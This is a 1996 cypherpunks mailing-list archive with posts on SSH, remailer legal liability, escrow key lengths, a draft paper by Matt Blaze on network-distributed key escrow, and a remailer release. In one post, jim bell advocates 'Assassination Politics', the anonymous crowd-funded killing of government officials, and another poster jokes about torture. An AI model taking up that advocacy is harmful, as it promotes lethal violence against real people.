------------------------
	    ***  Only 3 weeks left!  ***
***  Register today to reserve your place at SFC'96!   ***

Registration for the conference is still available through the
conference Web site "Registration" page.  Electronic registrations
will be accepted only through June 7th.  After that you must register
at the conference registration desk in the Cliff Lodge in Snowbird.  

To register see http://www.lanl.gov/SFC/96/reginfo.html.


Diverse Keynote Speakers Featured
---------------------------------
We are honored to feature the following prominent leaders from industry 
and academia as the keynote speakers of the conference:
	Laura Breeden, Formerly of USDC National
           Telecommunications & Information Administration
	Tom Landauer, University of Colorado, Boulder
	Bob Lucky, Bellcore
        Charlie Slocomb, Los Alamos National Laboratory
        Bud Wonsiewicz, U S WEST Advanced Technologies
	Bill Wulf, University of Virginia

Other important leaders have been invited as moderators and panelists.
See the conference Agenda Web page for details:
	http://www.lanl.gov/SFC/96/program.html


Unique Workshops Offered
------------------------
The conference is pleased to offer 4 unique and important
workshops this year.  Each offers intriguing opportunities, and 
all 4 are very different from each other.  The workshops are integrated
into the conference agenda throughout the conference so that their
study and findings will enhance the participants' experience of the
conference as a whole, as well as offering their outcomes to the
entire conference attendance.  The workshops are as follows:

       Steve Cisler, Willard Uncapher, Larry Press: "Implications 
	of the Net for Industrialized Countries, Developing Nations, 
	and Indigenous Cultures"

       Richard G. Epstein:  "Emerging Realities, Virtual and Otherwise" 

       Mary A. Meyer:  "Anthropology and SFC'96 Computer Technologies" 

       Ben Shneiderman: "The Durango Declaration Continued: 
	Toward A Snowbird Conference Statement" 


Outstanding Agenda
------------------
The conference technical program is very full and provides a robust,
multidisciplinary agenda for a wide range of interesting and important
discussions.  This program is balanced with hikes in the clean mountain
air of Snowbird.  Attendees are coming from all over the United States 
and a few foreign countries as well.  Please see the Web agenda page 
for details:     http://www.lanl.gov/SFC/96/program.html


Questions?
----------
All conference information and the registration form are available
through the Web site (http://www.lanl.gov/SFC/96/).

Any questions or comments you might have may be addressed to sfc96@lanl.gov.


   <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 16:17:51 +0800
To: cypherpunks@toad.com
Subject: Re: SSL Telnet Proxy?
In-Reply-To: <199605242231.PAA12375@infinity.c2.org>
Message-ID: <Pine.LNX.3.93.960524205956.878D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996 herodotus@alpha.c2.org wrote:

> Does anyone know of a publically available telnet proxy, preferably
> one using SSL?

	There is SSH, more of a rlogin. I don't know if it uses SSL or
not.
	Here is the first bit of the README:

Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  It is inteded as a
replacement for rlogin, rsh, rcp, and rdist.

See the file INSTALL for installation instructions.  See COPYING for
license terms and other legal issues.  See RFC for a description of
the protocol.  There is a WWW page for ssh; see http://www.cs.hut.fi/ssh.

	Compiled out of the box under linux. 	

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 25 May 1996 16:19:27 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <Pine.SUN.3.93.960524225500.27374F-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.93.960524210513.878E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 May 1996, Black Unicorn wrote:

> On Fri, 24 May 1996, snow wrote:
> > On Fri, 24 May 1996, Black Unicorn wrote:
> > > On Thu, 23 May 1996, Mike Duvos wrote:
> > > > > believe that Matt Blaze recently received "The Briefing" and he is
> > > > > still on our side.
> > > > Don't suppose Matt could do a little executive summary of 
> > > > "The Briefing" and post it to the list, could he?
> > > Probably not unless he wanted to do time.
> > > I suspect some anonymous person might put bamboo shoots under his
> > > fingernails and post the results of the interrogation however.
> > 
> > 	Isn't this exactly what the anon remailers were designed for?
> 
> That was the point, yes.

	Sorry, I was on skim mode, and missed the "posts the results"
portion. I was just thinking along the lines of getting the bamboo slivers
(shoots don't work too good) under the finger nails. How pedestrian.  


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Sat, 25 May 1996 16:42:51 +0800
To: jim bell <minow@apple.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <1.5.4.16.19960525030725.34bfb678@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01.03 PM 5/24/96 -0800, jim bell wrote:

>If the Libyans are so bad (and they probably are) then why shouldn't the 
>public in other countries be entitled to pool their contributions and take 
>their government down?

I believe I understand the basic concepts of AP - perhaps not the far-reaching
implications, but the fundamentals. I've thought about it, and I am against this
system. What will happen when you've killed off all of the politicians/gov't
employees
who haven't quit? Do you really think this will make things better? Anarchy
simply
won't work with people. Have you ever read Lord of the Flies? I'm sure some
people
haven't. I will explain my reasoning.

In Lord of the Flies (a novel by William Golding) a group of British
schoolboys are
deposited on a desert island. They have been evacuated from England because
of a 
nuclear war. There are no adults. A responsible few try to maintain the
rules and
order of society to which they all are accustomed, but they are symbolically
"AP'ed"
out of power when the anarchists of the group break away and form their own
tribe.
To make a long story short, they revert to animal sacrifice, and human
sacrifice,
before the story closes. Very unsettling, no? The defects of society can be
traced
back to the defects in the individual. A direct quote from the author, who
is not
infallible, or even a reputable authority on the flaws and merits of
humanity, but
still, who is to say that once our notably corrupt governments are gone, the
corruption
in ourselves won't surface? Who is to say that we are any better than the
government?
They had to come from somewhere - the public, obviously. Have any of you AP
proponents
considered that perhaps our oh-so-corrupt government officials are simply
the best 
that our amoral, decaying populace has to offer? What would we gain by
rubbing them
out?

The point I make is that in elected governments (and I realize, not all are
so lucky)
the elected people are, most likely, the best of what the public has to
offer. Who
can blame them for being corrupt? Doesn't all power corrupt? I believe so. Maybe
the current form of government isn't perfect, or even great, but it is still
much
better than anything that could possibly result from anonymous terrorism,
which is
really what AP is, isn't it? Peace can only be achieved by understanding,
not through
force or fear.

>(okay, this is a rhetorical question...)

Oops. Well. It's too late now... :-)

David

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaZ4tRguzHDTdpL5AQEW3gP+OvHHoPxJnFQUahCsjYcQaRJ2FV6eJA7F
s0BQ0jSvJCsGjMCEzT+bsNpErSNVxIafuq5AkMJQFhQHkhxUrPl/eqtBhomh5YV1
6CD5VGL0y030zmdzDBhLpJjLjKIkMzAC1DIdLmWCXZRyHDCD00KRdyRup72XZAqQ
Ka3Klr8JOBQ=
=LXi/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 13:44:05 +0800
To: unicorn@schloss.li
Subject: Re: An alternative to remailer shutdowns
Message-ID: <01I53JFM4MP28Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 11:44:01.40

>While a ski-lift ticket could be considered a "license" to use the
>property, selling an actual intellectual property ITEM makes the limiting
>terms of its purchase a bit easier for a court to stomach.  Telling a
>licensee that if he gets hurt its too bad, and telling one that he cannot
>call a function or copy the work are fairly distinct in this way.

	Hmm... the first (license vs item) could be argued with by that the
remailer operator _is_ sending the recipient a copyrighted work, which the
remailer has - so far as it knows - been given proper permission to choose to
transfer to the recipient.
	The second is more bothersome, and is an instance of the unfortunate
overuse of liability in the American legal system. As you state,

>In the practical world, the plaintiff who is trying to enforce a software
>licensing agreement is much better off than a defendant trying to resist
>liability for a tort.

	I would gather that countersuits for violation of a contract - that not
to sue - would not be likely to succeed. Unfortunate.

>That depends.  If there was reason to believe, for instance, that the
>message might indeed be four-horseman type (as a plaintiff's attorney I
>would jump all over any messages which came from "soandso@PLO.com" or
>somesuch) then negligence becomes an issue regardless.  Perhaps the host
>was the site from which other nastiness was mailed?  Anything that could
>be shown to put the operator on effective, implied, or constructive notice
>that something was amiss.

	A clear reason for demanding that mail come from a recognized remailer
before putting it to an output end. In this case, the ouputting remailer never
has to worry about it - that's the job of the actual primary inputting
remailer.

>Remember, technical savvy judges are few and far between.  Technical savvy
>juries are nearly non-entitites.  My concept of what is or is not
>suspicious when it comes to such things is going to be much more
>sophisticated than that of a judge or jury in most if not all cases.

>This is an important point.

>The truth of the matter is entirely pointless in the U.S. Judicial system.
>The APPEARANCE of the matter is key.

>'punks seem to forget this in all their discussion of what a court might
>do because, simply put, they know more than 99% of the population about
>the subject.
 
	The simple way to put this is that juries and, indeed, the voting
population, are completely incompetent to be in power. This is always
something that one should remember, and an excellent argument as to why
democracy is not a good system of government.

>From the recipiant?
>I would simply put a notice of where complaints can be directed to, and
>publish a stated (and carefully worded) policy for addressing abuses.

>This will go a LONG way to insulating remailer operators.

>"Your honor, my client has made every effort to filter the legitimate
>users of his system from the illegitimate.  He has a stated policy
>regarding complaints and investigates them to the full extent of his
>ability in every case in which a complaint is filed.  Even as this is so,
>he can no more completely assure that harassing messages will never slip
>through than can the U.S. post office protect every citizen from mail
>bombings."

>Or some such.  If you can say this in court and back it up, you're in
>better shape.

	Would also doing a respond-back hold harmless agreement, of the form
perhaps of: "We do our best to guarantee that this system will not be used
illegitimately. Unfortunately, this is not always possible. By responding to
this message and requesting us to send you the information in question, you are
agreeing to hold us harmless." help any? Or would this be seen by the court as
an attempt to reduce liability when the court (incorrectly) believes it should
be assigned?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 16:52:16 +0800
To: cypherpunks@toad.com
Subject: Re: Announcing CryptaPix 1.0
Message-ID: <199605250414.VAA03308@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 5/24/96 CDT, Daniel R. Oelke wrote:

>>            NEW GRAPHICS VIEWER FOR WINDOWS RELEASED
> 
>> What sets CryptaPix apart from ordinary viewers is its secure
>> encryption feature utilizing the same technology found in Puffer
>> 2.0. The encryption feature prevents unauthorized use of your
>> personal image collection by requiring a password for access.
>> Images are decrypted directly into memory for viewing.  A secure
>> wipe feature will permanently remove unwanted images from your
>> disk drive.
>> 
>[...more stuff deleted...]
>
>Expect to be hearing about this being a problem 
>with some child porn case real soon now... <sigh>
>
>However - I can see this becoming VERY popular with the 
>teenage crowd wanting to keep mom & dad out of their stash ;-)
>
>That being said - Thumbs up to Kent for another crypto program 
>that pushes the "genie" even farther out of the bottle.

What they ought to do is to "stegofy" this system by binding a picture with 
a lower-quality, non-suspicious picture which can be brought up with a 
"duress code." 


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 25 May 1996 15:57:51 +0800
To: unicorn@schloss.li
Subject: Re: Layman's explanation for limits on escrowed encryption ...
Message-ID: <01I53K6SDN348Y4Z90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 24-MAY-1996 15:07:57.78
>On Wed, 22 May 1996, Ernest Hua wrote:

>> Could someone with some knowledge of NSA/DoS/FBI intentions please
>> explain why key length limitations are necessary for escrowed
>> encryption?

>To deal with the possibility that someone might slip through the cracks of
>the escrow process.

>Insurance.

	Hmm.... what were the normal key-length recommendations again? This
appears to imply that the NSA can break at least 64-bit, and probably 80-bit,
encryption. How does this translate into public key lengths? E.g., how many
normal bits is a 1024-bit PGP key equivalent to?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 25 May 1996 18:53:42 +0800
To: cypherpunks@toad.com
Subject: "Key Escrow without Escrow Agents"
Message-ID: <199605250132.VAA09818@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a draft of a (rather half-baked) data recovery scheme that I'll be
presenting at a workshop next week.  I've included the LaTeX source below;
sorry for the length and for the formatting (which should be reasonably
easy to ignore for those without LaTeX).

Please include me in any response, since I don't read the list these days.

-matt
======cut here====
\documentstyle[11pt,fullpage]{article}

\begin{document}

\title{Key Escrow without Escrow Agents}

\author{{Matt Blaze}\\
AT\&T Research\\
Murray Hill, NJ 07974\\
{\tt mab@research.att.com}}

\date{DRAFT -- 24 May 1996 -- Extended Abstract -- DRAFT}

\maketitle

\begin{abstract}
We propose a simple scheme, based on secret sharing over large-scale
networks, for assuring recoverability of sensitive archived data
(e.g., cryptographic keys).  In our model anyone can request a copy of
the archived data but it is very difficult to keep the existence of a
request secret or to subvert the access policy of the data ``owner''.
We sketch an architecture for such a system that might be suitable for
deployment over very large-scale networks such as the Internet.
\end{abstract}

\section{Introduction}

In any system in which sensitive information must be stored for future
use, there is a fundamental tension between ensuring the {\em secrecy}
of data against those who are not authorized for access to it and
ensuring its {\em availability} to those who are.  Secrecy is often
best served by making only a small number of carefully-guarded copies
of the data, while availability favors a policy of the widest possible
dissemination in the hope that at least one copy will be intact at the
time it is required.  In general, a balance has to be struck between
these two goals based on the requirements of and resources available
to the particular application, but in any case copies of the sensitive
data must be controlled in some careful manner (e.g., through the use
of an off-site, trusted backup facility employing guards and other
effective, if expensive, security practices).

Another approach is ``key escrow'', in which the sensitive data is
encrypted so that the ciphertext can be widely copied and backed-up
via conventional methods, but the decryption keys are controlled in
some careful manner by trusted third parties who assume responsibility
for revealing the keys to authorized entities in the event of an
emergency.  One advantage of key escrow over controlled backup of the
data itself is that keys can be escrowed at any time, even prior to
the creation of the actual sensitive data, and one escrowed key can
represent arbitrarily much encrypted information.  A number of key
escrow schemes have been proposed for a variety of applications, most
with the aim of facilitating law enforcement access to encrypted data,
but also for commercial data recovery
\cite{clipper}\cite{micali}\cite{tis}\cite{denning}.

Third party backup, whether of data or keys, has a number of
disadvantages, however.  The ``escrow agents'' must be highly trusted
and carefully protected, since compromise single escrow site (or small
set of sites, in the case of split data) can result in an irrevocable
loss of security.  Since protecting such data is likely to be
expensive, one escrow site can be expected to serve many different
sets of data, making each site an attractive ``fat target'' for
attack.  Finally, legal, liability, and conflict-of-interest issues
sometimes make it difficult to ensure that an escrow agent will act
only in the best interests of the data owner, especially when served
with a legal demand to turn over keys or tempted with some inducement
to misbehave.  One of the frequently-raised objections to
government-run key escrow systems (e.g., the ``Clipper'' chip) is the
fear that the escrow centers will, perhaps secretly, assist a rogue
government in violating its citizens' privacy.

In this abstract, we propose a different model for assuring both
recoverability and protection of sensitive data based on two concepts:
secret sharing and the decentralized nature of large, heterogeneous
networks such as the Internet.  In our model, anyone can request a
copy of anyone's data but it is not possible to keep the existence of
such a request secret or to subvert the access policy of the data
``owner'' without subverting a significant fraction of participants in
the network.  There are no explicit ``escrow agents''; instead, key
shares are distributed widely to ordinary networked computers spread
across a wide variety of administrative and geographic boundaries.

\section{``The Net'' as an Escrow Agent}

The goal of our scheme is to make it difficult to recover escrowed
data without the knowledge and consent of the data owner, while still
assuring high availability in an emergency.  Its security rests on the
premise that highly distributed systems spread over many
administrative, political, and geographic domains (such as the
Internet), are more robust than any single site or small set of
sites, no matter how well protected.  Other systems, such as Eternity
\cite{eternity}, have recognized and exploited this property of
global networks for maintaining information availability; we simply
expand this notion to include secrecy as well.

We assume that each node (or a large number of nodes) in the network
runs an ``escrow server'' that performs most of the steps of the
protocol, and that there is some broadcast mechanism for reaching them
(which could be based on existing mechanisms such as Usenet news).
The first step in using ``the net'' as an escrow agent is to split the
key to be escrowed using some secret sharing scheme \cite{simmons}
with a very large number of shares (e.g., a $k$ out-of $n$ scheme
where $k=500$ and $n=5000$, but we leave the details of determining an
appropriate access structure to the reader).  Next, we package each
share along with a key identifier, a digital signature of the share,
and a policy describing the circumstances under which the share should
be disclosed (discussed below).  Finally, we select, at random (or
according to some other policy) as many sites as we have shares and
send one share to each site, over a secure channel.  We then destroy
the shares and the list of sites to which they were sent.

To recover escrowed data, we broadcast a request for shares for the
key identifier we want to recover, using some mechanism that is likely
to be received by the shareholders' escrow servers.  Upon receipt of a
request for shares, each escrow server logs the request and, if it
holds a share for the key in question, checks the policy contained in
the share package.  If the request conforms to the policy we send the
share to the requester.  The requester (who can verify the
authenticity of each share by checking the signature) can recover the
key once enough shares have been received.

Whether such a scheme is robust, secure, or otherwise adequate depends
primarily on three factors: the reliability (in terms of continued
existence, security against compromise, and ability to follow
instructions) of the nodes that handle the key shares, the access
structure of the secret sharing scheme, and the nature of the policy
that each node is supposed to follow.

If the nature of today's Internet is any indication, we must assume
that the individual nodes are not very reliable, especially over time.
Some nodes will simply disappear.  Others will maliciously fail to
follow instructions.  Still others will fail to safeguard their
shares, sometimes due to malice but more often as a result of mistake,
incompetence, or failure of some underlying security mechanism.  It is
likely that as the net grows these issues will become even more
pronounced.  Therefore, the security of the scheme depends on a choice
of access structures and policies that assumes that a large fraction
of shareholders will not follow the correct protocol.

The secret sharing access structure must be chosen to require enough
shares to prevent key recovery by collusion among a few nodes, yet
with enough redundancy to allow recovery in the likely event that most
nodes are not available or did not retain their shares at the time key
recovery is required.  Scale appears to help here; consider, for
example, a 500 out of 5000 threshold scheme, which permits key
recovery even when 90\% of nodes have failed and yet retains its
security until 500 nodes have been compromised.  The distribution of
nodes could also play a part here, particularly when the key is split
with a more sophisticated access structure.  For example, key shares
could be distributed to nodes selected across a variety of
administrative, legal, political and geographic domains, with the
access structure selected to require that shares be collected from
nodes in several different categories.

Each shareholder is also asked to respect the access policy included
with the share.  The policy must be designed to facilitate emergency
access without also permitting undetected disclosure.  Because shares
can only be recovered by broadcasting, we can take advantage of the
inherently public nature of requests in formulating the access
policies.  For example, the policy might specify a public signature
key to which the real key holder knows the corresponding secret and a
request to delay revealing key shares for some period of time, say one
week.  If an unauthorized request for a key is broadcast, the real key
holder would have one week to notice the request and broadcast another
message, signed with this key, requesting that the shareholders ignore
the original request and turn over information that might aid in
tracking down the source of the unauthorized request.  Policies might
also include instructions on the minimum identification that share
requests must include and instructions on how share requests should be
logged (e.g., by posting to a news group or even advertisements in
newspapers).  They might also include an expiration date beyond which
the share is to be deleted.  We defer the question of how policies
should be specified, but it may be sufficient for the server, upon
receipt of a share request, to send a message to its (human) operator
containing instructions (written in English) that were included in the
share package.

Some infrastructure is required.  Key holders would need a directory
or other mechanism for identifying and communicating with escrow
servers at the time the shares are created.  A broadcast mechanism for
key recovery is also required.  It is possible that existing
mechanisms could suffice for both these purposes (e.g., DNS for server
identification and Usenet news for broadcasting) but more specialized
systems would be required if this scheme were to be fielded on a large
scale.

Share distribution must be secure against both eavesdropping and
traffic analysis.  The need for security against eavesdropping is
obvious, since observing all the shares allows recovery keys without
the assistance of the shareholders.  Resistance to traffic analysis is
required to ensure that shares can only be recovered by broadcasting.
If the identities of the shareholders are known, an attacker could
``target'' the sites believed to be weakest, and, if successful,
recover shares without broadcasting the request and without following
the share access policy.  Shares could be distributed via an anonymous
communication network or some other mechanism (such as oblivious
transfer) that obscures the nature of the transaction from an observer
(and perhaps even from the participants themselves).  Key identifiers
should be chosen so that an outside attacker cannot derive the purpose
or owner of the key from its identifier and so that shareholders do
not know exactly what their shares are for.  In any case, the list of
shareholders should not be retained by the key owner once the shares
have been distributed.

\subsection{Emergency Access -- ``Angry Mob Cryptanalysis''}

In general, the key identifier should be stored with all copies of the
ciphertext (since without the key ID, it is impossible to recover a
key).  Under ordinary circumstances when a key recovery is required,
the original key owner will initiate the request.  The owner extracts
the key ID and broadcasts the request to the network, performing
whatever (presumably public) logging is required by the policy that
was sent to the shareholders.  Upon receipt of the broadcast,
each server checks whether it is a shareholder for the requested key.
If it is, it checks whether request satisfies the access policy
(perhaps by transmitting a copy of the English-specified policy to the
server operator, perhaps by automated means if the policy is more
formally specified).  If the access policy is satisfied (e.g., a
message announcing the request appeared in some established place, a
certificate of the identity of the requester was included in the
request, or whatever) and after waiting however log the policy
specified to allow for repudiation of the request by the legitimate
key owner, the share is transmitted back to the requestor over a
secure channel.  The requestor can then combine the shares to recover
the key; corrupted shares will not affect the protocol since the
shares should have been digitally signed by the original key owner at
the time they were distributed.

Sometimes, however, an extreme emergency might make it necessary to
recover keys in a manner contrary to the policy specified in the
original shares.  For example, it may be necessary to recover keys
before the policy-imposed delay has elapsed, or to obtain access in
spite of the objections of the original key owner.  Such a situation
is most likely to arise from some kind of law enforcement or public
safety emergency in which the requestor makes the case that public
policy should supersede the access policy of the key holder.  Of
course, such a situation is fraught with difficult issues of judgement
and policy, and fears of abuse, fraud, or coercion are among the
primary objections raised against key escrow in general.  Our scheme
places the burden of determining whether such an exceptional access
request should be granted on the shareholders.

Indeed, the dependence on the collective judgement of the widely
distributed shareholder operators may be the scheme's most important
property.  Under normal circumstances, the shareholders can be
expected to behave approximately as specified in the share policies
(with occasional pathological exceptions, limited in their effect by
the nature of the secret sharing access structure).  In exceptional
situations, however, a public appeal can be made in an attempt to
convince the shareholders to reveal their shares in a manner not
permitted by the stated policy (e.g., the police could broadcast an
appeal for key shares on television news, stating the facts of the
case under investigation).  In particular, because the identities of
the shareholders are not known, such an appeal must be done publicly
and in a manner designed to attract considerable attention.  It is not
possible to secretly induce, through legal means or otherwise,
shareholders to reveal their shares.  For some applications (e.g.,
personal information associated with an individual), such a scheme
could be acceptable even when key escrow is not.  (We introduce the
rather lighthearted term ``angry mob cryptanalysis'' to refer to the
threat of enough shareholders being convinced to violate the share
access policy to permit key recovery.  It is distinguished from
``rubber hose cryptanalysis,'' which involves obtaining keys by legal
or extra-legal intimidation\footnote{The phrase ``rubber hose
cryptanalysis'' appears to be due to Phil Karn.}.)

\section{Conclusions}

Key escrow is a confusing subject, especially so because there is
little general agreement as to even its basic goals and requirements.
We have proposed a scheme that has a number of interesting properties
that may make it appropriate for protecting secrecy and availability in
certain kinds of applications.  A number of open problems remain, of
course, before such a scheme could be made completely practical.
Areas for further study include the effects of different access
structures, specification of policy, and economic, performance, and
reliability analysis.

Of course, we do not in complete seriousness propose this scheme as a
general solution to the key recovery problem, but intend instead to
open a new avenue of discussion.  In particular, the scheme appears to
address many of the concerns of both opponents of ``government'' key
escrow as well as many of the (stated) concerns of law enforcement.

\section{Acknowledgements}

Much of the inspiration for this scheme arose from Ross Anderson's
description of the motivation and principles behind the Eternity file
service, in conversations at Cambridge and at AT\&T Bell Labs.

\begin{thebibliography}{MMMM00}

\bibitem[Ande96]{eternity}
\newblock Ross Anderson.
\newblock ``The Eternity Service.''
\newblock Invited paper to appear at {\em Pragocrypt 96.} 30 Sep - 3
Oct 1996, Prague.

\bibitem[Denn96]{denning}
\newblock Dorothy Denning.
\newblock ``A Taxonomy for Key Escrow Encryption Systems.''
\newblock {\em CACM.}  March 1996.

\bibitem[Mica94]{micali}
\newblock Silvio Micali.
\newblock ``Fair Cryptosystems.''
\newblock {\em MIT/LCS/TR-579.c}  Laboratory for Computer Science,
Massachusetts Institute of Technology, Cambridge, MA, August 1994.

\bibitem[NIST94]{clipper}
\newblock National Institute for Standards and Technology.
\newblock Escrowed Encryption Standard, {\em Federal Information
Processing Standards Publication 185}, U.S.  Dept. of Commerce, 1994.

\bibitem[Simm92]{simmons}
\newblock G.J. Simmons.
\newblock ``An introduction to Shared Secret and/or Shared Control
Schemes and their Applications.''
\newblock In {\em Contemporary Cryptolgy,} Simmons, ed. IEEE Press,
1992.

\bibitem[WLEB96]{tis}
\newblock Stephen T. Walker, Stephen B. Lipner, Carl M. Ellison, and
David M. Balenson.
\newblock ``Commercial Key Recovery.''
\newblock {\em CACM.} March 1996.


\end{thebibliography}


\end{document}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 25 May 1996 10:55:35 +0800
To: cypherpunks@toad.com
Subject: Denning Sums Key Escrow
Message-ID: <199605242134.VAA13386@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Professor Dorothy Denning has an impressive accounting of 30+ 
key escrow systems, dated May 1, 1996, at: 
 
http://guru.cosc.georgetown.edu/~denning/crypto/Appendix.html 
 
 
This pointer came from "Marg's" report on a Denning seminar  
in February at: 
 
http://www.dstc.qut.edu.au/MSU/staff/marg/denning-sem.html 
 
 
Marg's site also has pointers to an impressive array of 
worldwide E-commerce and security links at: 
 
http://www.dstc.qut.edu.au/MSU/staff/marg/ecom.html 
 
----- 
 
Thanks much, Marg. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 25 May 1996 16:25:46 +0800
To: David Rosoff <minow@apple.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <199605250455.VAA04892@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 5/24/96 -0600, David Rosoff wrote:

>At 01.03 PM 5/24/96 -0800, jim bell wrote:
>
>>If the Libyans are so bad (and they probably are) then why shouldn't the 
>>public in other countries be entitled to pool their contributions and take 
>>their government down?
>
>I believe I understand the basic concepts of AP - perhaps not the far-reaching
>implications, but the fundamentals. I've thought about it, and I am against 
this
>system. What will happen when you've killed off all of the 
politicians/gov't employees
>who haven't quit? Do you really think this will make things better? 

1.  There will be no politicans and government employees, except for those 
few who do not arouse the ire of more than a tiny fraction of the 
population, and are paid for by voluntary contributions.  In other words, 
damn few.

2.  There will be no taxes and no war.  Any disputes will be of very small 
scale, a handful of people at most.

3.  Individuals will be able to, and in fact will be responsible to defend 
themselves, although they may be able to do it by proxy.  People will always 
have the option of defending others, and will do so if they believe that it 
deters future crimes that might be against them.

>Anarchy simply
>won't work with people. Have you ever read Lord of the Flies? I'm sure some
>people haven't.

Yes, I read it years ago.  That book is fiction.  Whether it represents any 
sort of potential reality is highly questionable.  Even its premise is 
stilted:  It hypothesizes a tiny, essentially homogenous society populated 
by immature boys, dropped into circumstances entirely foreign from anything 
they had ever known, with no adult guidance at all.  Can you really expect 
good results from this, in fiction no less?  Would it have made a good book 
if everything had happened hunky-dory?

Anyway, anarchy is tradionally considered unstable because the strong are 
able to oppress the weak, and the weak can't effectively fight back, so 
governments are instituted.  The system I've described, AP, allows a 
substantial number of anonymous weak people to (anonymously) pool their 
resources and defend themselves against a smaller number of strong 
oppressors.  This is NEW.  It may, in fact, allow anarchy to exist in a 
stable form, which may sound like an oxymoron but is not.  If anarchy does 
indeed work, when suitably stabilized, then your premise is simply wrong.

> Have any of you AP proponents
>considered that perhaps our oh-so-corrupt government officials are simply
>the best that our amoral, decaying populace has to offer? What would we 
>gain by rubbing them out?

I see we have another Dr. Pangloss here.  "the best of all possible worlds."

We have plenty to gain by removing them from their positions of power.  They 
are wasteful parasites.  They engage in make-work.  They manipulate the rest 
of us.  They criminalize activities that should not be crimes.  They make us 
waste our resources, for example by keeping ever-larger numbers of people in 
jail and prison.  They are protected by militaries, which are wasteful uses 
of our resources.  Ultimately, they end up killing huge numbers of people, 
ultimately just to protect the supremacy of these government employees and 
officeholders.


> Maybe the current form of government isn't perfect, or even great, but it is still
>much better than anything that could possibly result from anonymous terrorism,
>which is really what AP is, isn't it? 

Who is to say that we even need a government?  What, exactly, is the 
function of a government?  Is that function truly necessary?  Remember, AP 
changes the political landscape substantially.  You can't any longer say 
things like "governmnet is necessary so that we can protect ourselves 
against foreign nations," because there will no longer be any foreign 
nations, or foreign armies, etc.

>Peace can only be achieved by understanding, not through force or fear.

Sounds like a truism that isn't necessarily true.  Don't deny individuals 
the right to defend themselves.  If you do, then you actually encourage 
force used against them, and magnify their fear.  Don't selectively apply 
this rule to ordinary citizens, while forgetting to apply it to officials.

And maybe we don't really even need to "achieve peace."  I've come to the 
conclusion that the only reason war is "necessary" is to protect the 
leadership of a country, not to protect its citizens.  Remove that 
leadership from power, and peace will be automatic.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 25 May 1996 13:45:12 +0800
To: alt.privacy.anon-server@myriad.alias.net
Subject: middleman remailer available on hacktic
Message-ID: <199605241955.VAA24531@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


	The middleman remailer software is now available for download. The
file middleman.tar.gz can be found on ftp.hacktic.nl in
/pub/replay/pub/incoming and /pub/replay/pub/remailer. Installation
instructions are included. 

					middle-man-admin@alpha.c2.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 25 May 1996 22:33:59 +0800
To: cypherpunks@toad.com
Subject: Re: PILATE SAYETH UNTO HIM...
In-Reply-To: <Pine.SUN.3.91.960524072314.8972A-100000@crl2.crl.com>
Message-ID: <v0300660fadcc22e0b23f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM  -0400 5/24/96, snow wrote:
> 	Reality viewed through the lenses of Dogma.

The Words Speak You
War is Peace
Freedom is Slavery
Murk is Darts <er, scratch that...>

Can we stop this crap, now?

Cheers,
Bob Hettinga






-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
